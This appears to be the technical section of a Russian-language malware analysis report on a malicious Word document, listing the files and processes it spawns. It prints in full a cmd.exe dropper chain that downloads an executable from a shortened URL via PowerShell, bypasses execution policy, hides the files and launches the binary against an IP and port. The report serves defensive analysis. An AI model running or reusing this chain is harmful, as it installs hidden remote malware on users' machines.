Техническая информация
- '<SYSTEM32>\cmd.exe' /c echo (wget 'https://tinyurl.com/y88r9epk' -OutFile a.exe) > b.ps1 & attrib +h +s b.ps1 & powershell -ExecutionPolicy ByPass -File b.ps1 & attrib +h +s a.exe & START /MIN a.exe 10.0.0.11 8080...
- <Текущая директория>\~wrd0000.tmp
- <Текущая директория>\b.ps1
- <Текущая директория>\b.ps1
- <PATH_SAMPLE>.doc
- '<SYSTEM32>\cmd.exe' /c echo (wget 'https://tinyurl.com/y88r9epk' -OutFile a.exe) > b.ps1 & attrib +h +s b.ps1 & powershell -ExecutionPolicy ByPass -File b.ps1 & attrib +h +s a.exe & START /MIN a.exe 10.0.0.11 8080...' (со скрытым окном)
- '<SYSTEM32>\attrib.exe' +h +s b.ps1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy ByPass -File b.ps1
- '<SYSTEM32>\attrib.exe' +h +s a.exe